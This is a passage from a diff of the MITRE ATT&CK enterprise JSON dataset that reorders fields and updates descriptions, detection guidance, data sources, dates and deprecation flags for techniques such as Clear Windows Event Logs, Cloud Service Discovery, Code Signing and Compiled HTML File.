"Host Intrusion Prevention Systems",
"Log Analysis"
],
- "x_mitre_system_requirements": [
- "Clearing the Windows event logs requires Administrator permissions"
+ "x_mitre_permissions_required": [
+ "Administrator"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_detection": "Deleting Windows event logs (via native binaries (Citation: Microsoft wevtutil Oct 2017), API functions (Citation: Microsoft EventLog.Clear), or [PowerShell](https://attack.mitre.org/techniques/T1059/001) (Citation: Microsoft Clear-EventLog)) may also generate an alterable event (Event ID 1102: \"The audit log was cleared\").",
+ "x_mitre_data_sources": [
+ "API monitoring",
+ "Process command-line parameters",
+ "Process monitoring",
+ "File monitoring"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f",
@@ -3444,7 +3507,7 @@
"source_name": "MSDN Clipboard"
},
{
- "url": "http://www.rvrsh3ll.net/blog/empyre/operating-with-empyre/",
+ "url": "https://medium.com/rvrsh3ll/operating-with-empyre-ea764eda3363",
"description": "rvrsh3ll. (2016, May 18). Operating with EmPyre. Retrieved July 12, 2017.",
"source_name": "Operating with EmPyre"
}
@@ -3459,19 +3522,19 @@
"phase_name": "collection"
}
],
- "modified": "2020-03-23T23:55:08.013Z",
+ "modified": "2020-04-23T18:35:58.230Z",
"created": "2017-05-31T21:31:25.967Z",
- "x_mitre_version": "1.1",
- "x_mitre_data_sources": [
- "API monitoring"
- ],
- "x_mitre_detection": "Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity.",
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Linux",
"Windows",
"macOS"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_detection": "Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity.",
+ "x_mitre_data_sources": [
+ "API monitoring"
+ ],
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -3522,29 +3585,29 @@
],
"modified": "2020-03-24T12:44:27.995Z",
"created": "2020-01-29T17:32:30.711Z",
- "x_mitre_platforms": [
- "AWS",
- "GCP",
- "Azure",
- "Office 365",
- "Azure AD"
- ],
- "x_mitre_contributors": [
- "Praetorian",
- "Microsoft Threat Intelligence Center (MSTIC)"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "Administrator"
],
+ "x_mitre_detection": "Collect usage logs from cloud user and administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.",
"x_mitre_data_sources": [
"Office 365 audit logs",
"Stackdriver logs",
"Azure activity logs",
"AWS CloudTrail logs"
],
- "x_mitre_detection": "Collect usage logs from cloud user and administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.",
- "x_mitre_permissions_required": [
- "Administrator"
+ "x_mitre_contributors": [
+ "Praetorian",
+ "Microsoft Threat Intelligence Center (MSTIC)"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "AWS",
+ "GCP",
+ "Azure",
+ "Office 365",
+ "Azure AD"
+ ]
},
{
"external_references": [
@@ -3590,6 +3653,18 @@
],
"modified": "2020-03-13T20:05:15.448Z",
"created": "2020-02-21T21:08:36.570Z",
+ "x_mitre_data_sources": [
+ "Azure activity logs",
+ "Office 365 account logs",
+ "Process monitoring",
+ "Process command-line parameters"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_platforms": [
"AWS",
"GCP",
@@ -3597,18 +3672,6 @@
"Office 365",
"Azure AD",
"SaaS"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_data_sources": [
- "Azure activity logs",
- "Office 365 account logs",
- "Process monitoring",
- "Process command-line parameters"
]
},
{
@@ -3662,6 +3725,19 @@
],
"modified": "2020-03-23T21:59:36.729Z",
"created": "2020-03-13T20:36:57.378Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
+ ],
+ "x_mitre_detection": "Perform regular audits of cloud accounts to detect abnormal or malicious activity, such as accessing information outside of the normal function of the account or account usage at atypical hours.",
+ "x_mitre_data_sources": [
+ "Azure activity logs",
+ "Authentication logs",
+ "AWS CloudTrail logs",
+ "Stackdriver logs"
+ ],
"x_mitre_platforms": [
"AWS",
"GCP",
@@ -3669,20 +3745,7 @@
"SaaS",
"Azure AD",
"Office 365"
- ],
- "x_mitre_data_sources": [
- "Azure activity logs",
- "Authentication logs",
- "AWS CloudTrail logs",
- "Stackdriver logs"
- ],
- "x_mitre_detection": "Perform regular audits of cloud accounts to detect abnormal or malicious activity, such as accessing information outside of the normal function of the account or account usage at atypical hours.",
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ ]
},
{
"external_references": [
@@ -3728,22 +3791,22 @@
],
"modified": "2020-03-12T19:25:12.782Z",
"created": "2020-02-21T21:15:33.222Z",
- "x_mitre_platforms": [
- "Office 365",
- "Azure AD"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Activity and account logs for the cloud services can also be monitored for suspicious commands that are anomalous compared to a baseline of normal activity.",
- "x_mitre_permissions_required": [
- "User"
- ],
"x_mitre_data_sources": [
"Azure activity logs",
"Office 365 account logs",
"API monitoring",
"Process monitoring",
"Process command-line parameters"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Activity and account logs for the cloud services can also be monitored for suspicious commands that are anomalous compared to a baseline of normal activity.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Office 365",
+ "Azure AD"
]
},
{
@@ -3810,21 +3873,21 @@
],
"modified": "2020-03-25T18:18:20.366Z",
"created": "2020-02-11T18:47:46.619Z",
- "x_mitre_platforms": [
- "AWS",
- "GCP",
- "Azure"
+ "x_mitre_contributors": [
+ "Praetorian"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor access to the Instance Metadata API and look for anomalous queries.\n\nIt may be possible to detect adversary use of credentials they have obtained. See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.\n\n",
"x_mitre_data_sources": [
"Authentication logs",
"AWS CloudTrail logs",
"Azure activity logs"
],
- "x_mitre_contributors": [
- "Praetorian"
+ "x_mitre_detection": "Monitor access to the Instance Metadata API and look for anomalous queries.\n\nIt may be possible to detect adversary use of credentials they have obtained. See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.\n\n",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "AWS",
+ "GCP",
+ "Azure"
]
},
{
@@ -3859,59 +3922,75 @@
"phase_name": "discovery"
}
],
- "modified": "2019-10-23T14:19:37.289Z",
+ "modified": "2020-07-14T19:19:00.966Z",
"created": "2019-08-30T18:11:24.582Z",
- "x_mitre_platforms": [
- "AWS",
- "GCP",
- "Azure",
- "Azure AD",
- "Office 365"
- ],
- "x_mitre_contributors": [
- "Praetorian"
- ],
- "x_mitre_version": "1.0",
- "x_mitre_permissions_required": [
- "User"
- ],
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_detection": "Monitor account activity logs to see actions performed and activity associated with the cloud service management console. Some cloud providers, such as AWS, provide distinct log events for login attempts to the management console.(Citation: AWS Console Sign-in Events)",
"x_mitre_data_sources": [
"Office 365 audit logs",
"Azure activity logs",
"Stackdriver logs",
"AWS CloudTrail logs"
],
- "x_mitre_detection": "Monitor account activity logs to see actions performed and activity associated with the cloud service management console. Some cloud providers, such as AWS, provide distinct log events for login attempts to the management console.(Citation: AWS Console Sign-in Events)"
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_contributors": [
+ "Praetorian"
+ ],
+ "x_mitre_platforms": [
+ "AWS",
+ "GCP",
+ "Azure",
+ "Azure AD",
+ "Office 365"
+ ]
},
{
+ "created": "2019-08-30T13:01:10.120Z",
+ "modified": "2020-06-23T14:31:41.758Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "discovery"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db",
+ "description": "An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. \n\nAdversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)\n\nStormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)",
+ "name": "Cloud Service Discovery",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
- "external_id": "T1526",
"source_name": "mitre-attack",
+ "external_id": "T1526",
"url": "https://attack.mitre.org/techniques/T1526"
},
+ {
+ "source_name": "Azure - Resource Manager API",
+ "url": "https://docs.microsoft.com/en-us/rest/api/resources/",
+ "description": "Microsoft. (2019, May 20). Azure Resource Manager. Retrieved June 17, 2020."
+ },
+ {
+ "source_name": "Azure AD Graph API",
+ "url": "https://docs.microsoft.com/en-us/previous-versions/azure/ad/graph/howto/azure-ad-graph-api-operations-overview",
+ "description": "Microsoft. (2016, March 26). Operations overview | Graph API concepts. Retrieved June 18, 2020."
+ },
+ {
+ "source_name": "Azure - Stormspotter",
+ "url": "https://github.com/Azure/Stormspotter",
+ "description": "Microsoft. (2020). Azure Stormspotter GitHub. Retrieved June 17, 2020."
+ },
{
"source_name": "GitHub Pacu",
"url": "https://github.com/RhinoSecurityLabs/pacu",
"description": "Rhino Security Labs. (2019, August 22). Pacu. Retrieved October 17, 2019."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Cloud Service Discovery",
- "description": "An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ depending on if it's platform-as-a-service (PaaS), infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many different services exist throughout the various cloud providers and can include continuous integration and continuous delivery (CI/CD), Lambda Functions, Azure AD, etc. Adversaries may attempt to discover information about the services enabled throughout the environment.\n\nPacu, an open source AWS exploitation framework, supports several methods for discovering cloud services.(Citation: GitHub Pacu)",
- "id": "attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "discovery"
- }
- ],
- "modified": "2019-10-17T19:11:02.353Z",
- "created": "2019-08-30T13:01:10.120Z",
"x_mitre_platforms": [
"AWS",
"GCP",
@@ -3921,18 +4000,20 @@
"SaaS"
],
"x_mitre_contributors": [
+ "Suzy Schapperle - Microsoft Azure Red Team",
"Praetorian"
],
"x_mitre_permissions_required": [
"User"
],
- "x_mitre_version": "1.0",
+ "x_mitre_version": "1.1",
"x_mitre_data_sources": [
"Azure activity logs",
"Stackdriver logs",
"AWS CloudTrail logs"
],
- "x_mitre_detection": "Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nNormal, benign system and network events that look like cloud service discovery may be uncommon, depending on the environment and how they are used. Monitor cloud service usage for anomalous behavior that may indicate adversarial presence within the environment."
+ "x_mitre_detection": "Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nNormal, benign system and network events that look like cloud service discovery may be uncommon, depending on the environment and how they are used. Monitor cloud service usage for anomalous behavior that may indicate adversarial presence within the environment.",
+ "x_mitre_is_subtechnique": false
},
{
"id": "attack-pattern--1b84d551-6de8-4b96-9930-d177677c3b1d",
@@ -3970,6 +4051,22 @@
"created": "2017-05-31T21:31:26.474Z"
},
{
+ "created": "2020-02-05T16:27:37.784Z",
+ "modified": "2020-02-10T19:51:01.601Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082",
+ "description": "Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.\n\nCode signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing) \n\nCode signing certificates may be used to bypass security policies that require signed code to execute on a system. ",
+ "name": "Code Signing",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -3992,22 +4089,6 @@
"source_name": "Symantec Digital Certificates"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Code Signing",
- "description": "Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.\n\nCode signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing) \n\nCode signing certificates may be used to bypass security policies that require signed code to execute on a system. ",
- "id": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "defense-evasion"
- }
- ],
- "modified": "2020-02-10T19:51:01.601Z",
- "created": "2020-02-05T16:27:37.784Z",
"x_mitre_platforms": [
"macOS",
"Windows"
@@ -4026,7 +4107,7 @@
"id": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Command and Scripting Interpreter",
- "description": "Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, many Linux distributions include [Bash](https://attack.mitre.org/techniques/T1059/004) as a default shell while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nThere are also additional third-party interpreters, such as [Python](https://attack.mitre.org/techniques/T1059/006), that may also be cross-platform.",
+ "description": "Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nThere are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).\n\nAdversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells.",
"external_references": [
{
"source_name": "mitre-attack",
@@ -4045,31 +4126,32 @@
"phase_name": "execution"
}
],
- "modified": "2020-03-28T17:44:07.939Z",
+ "modified": "2020-06-25T03:32:51.380Z",
"created": "2017-05-31T21:30:49.546Z",
- "x_mitre_version": "2.0",
- "x_mitre_data_sources": [
- "Windows Registry",
- "Windows event logs",
- "PowerShell logs",
- "Process monitoring",
- "Process command-line parameters"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_remote_support": false,
+ "x_mitre_permissions_required": [
+ "User"
],
- "x_mitre_detection": "Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools.",
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_detection": "Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.\n\nIf scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information discovery, collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.",
+ "x_mitre_data_sources": [
+ "Windows event logs",
+ "PowerShell logs",
+ "Process monitoring",
+ "Process command-line parameters"
],
- "x_mitre_remote_support": false,
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "2.0"
},
{
"id": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Commonly Used Port",
+ "description": "**This technique has been deprecated. Please use [Non-Standard Port](https://attack.mitre.org/techniques/T1571) where appropriate.**\n\nAdversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection. They may use commonly open ports such as\n\n* TCP:80 (HTTP)\n* TCP:443 (HTTPS)\n* TCP:25 (SMTP)\n* TCP/UDP:53 (DNS)\n\nThey may use the protocol associated with the port or a completely different protocol. \n\nFor connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), examples of common ports are \n\n* TCP/UDP:135 (RPC)\n* TCP/UDP:22 (SSH)\n* TCP/UDP:3389 (RDP)",
"external_references": [
{
"source_name": "mitre-attack",
@@ -4082,10 +4164,35 @@
"source_name": "University of Birmingham C2"
}
],
- "revoked": true,
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "revoked": false,
"type": "attack-pattern",
- "modified": "2020-03-14T18:19:14.698Z",
- "created": "2017-05-31T21:30:42.657Z"
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "command-and-control"
+ }
+ ],
+ "modified": "2020-07-06T17:54:28.071Z",
+ "created": "2017-05-31T21:30:42.657Z",
+ "x_mitre_deprecated": true,
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "x_mitre_network_requirements": true,
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)",
+ "x_mitre_data_sources": [
+ "Packet capture",
+ "Netflow/Enclave netflow",
+ "Process use of network",
+ "Process monitoring"
+ ],
+ "x_mitre_version": "1.0"
},
{
"id": "attack-pattern--64196062-5210-42c3-9a02-563a0d1797ef",
@@ -4109,20 +4216,21 @@
"phase_name": "command-and-control"
}
],
- "modified": "2019-07-16T20:53:20.583Z",
+ "modified": "2020-07-14T19:44:50.871Z",
"created": "2017-05-31T21:31:09.379Z",
- "x_mitre_version": "1.0",
- "x_mitre_data_sources": [
- "File monitoring",
- "Data loss prevention"
- ],
- "x_mitre_detection": "Monitor file access on removable media. Detect processes that execute when removable media is mounted.",
- "x_mitre_network_requirements": false,
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
- ]
+ ],
+ "x_mitre_network_requirements": false,
+ "x_mitre_detection": "Monitor file access on removable media. Detect processes that execute when removable media is mounted.",
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Data loss prevention"
+ ],
+ "x_mitre_version": "1.0"
},
{
"external_references": [
@@ -4150,6 +4258,22 @@
"created": "2019-04-25T20:53:07.719Z"
},
{
+ "created": "2020-03-16T15:30:57.711Z",
+ "modified": "2020-03-29T20:59:32.293Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617",
+ "description": "Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)\n\nSource code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)",
+ "name": "Compile After Delivery",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -4167,22 +4291,6 @@
"description": "Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads Info Stealer and Adware. Retrieved April 25, 2019."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Compile After Delivery",
- "description": "Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)\n\nSource code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)",
- "id": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "defense-evasion"
- }
- ],
- "modified": "2020-03-29T20:59:32.293Z",
- "created": "2020-03-16T15:30:57.711Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -4256,7 +4364,7 @@
},
{
"id": "attack-pattern--a6937325-9321-4e2e-bb2b-3ed2d40b2a9d",
- "description": "Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)\n\nA custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application whitelisting on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)",
+ "description": "Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)\n\nA custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)",
"name": "Compiled HTML File",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -4301,28 +4409,28 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-27T21:04:50.295Z",
+ "modified": "2020-06-20T22:32:24.589Z",
"created": "2020-01-23T18:53:54.377Z",
- "x_mitre_contributors": [
- "Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International"
+ "x_mitre_platforms": [
+ "Windows"
],
+ "x_mitre_detection": "Monitor and analyze the execution and arguments of hh.exe. (Citation: MsitPros CHM Aug 2017) Compare recent invocations of hh.exe with prior history of known good arguments to determine anomalous and potentially adversarial activity (ex: obfuscated and/or malicious commands). Non-standard process execution trees may also indicate suspicious or malicious behavior, such as if hh.exe is the parent process for suspicious processes and activity relating to other adversarial techniques.\n\nMonitor presence and use of CHM files, especially if they are not typically used within an environment.",
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_defense_bypassed": [
+ "Digital Certificate Validation",
+ "Application control"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
"File monitoring"
],
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_defense_bypassed": [
- "Digital Certificate Validation",
- "Application whitelisting"
- ],
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_detection": "Monitor and analyze the execution and arguments of hh.exe. (Citation: MsitPros CHM Aug 2017) Compare recent invocations of hh.exe with prior history of known good arguments to determine anomalous and potentially adversarial activity (ex: obfuscated and/or malicious commands). Non-standard process execution trees may also indicate suspicious or malicious behavior, such as if hh.exe is the parent process for suspicious processes and activity relating to other adversarial techniques.\n\nMonitor presence and use of CHM files, especially if they are not typically used within an environment.",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_contributors": [
+ "Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International"
]
},
{
@@ -4351,7 +4459,7 @@
],
"revoked": true,
"type": "attack-pattern",
- "modified": "2020-03-30T20:20:02.594Z",
+ "modified": "2020-07-07T16:44:26.493Z",
"created": "2017-05-31T21:31:22.374Z"
},
{
@@ -4396,33 +4504,33 @@
],
"modified": "2020-03-23T23:48:33.904Z",
"created": "2019-12-19T20:21:21.669Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_system_requirements": [
+ "Ability to update component device firmware from the host operating system."
],
+ "x_mitre_permissions_required": [
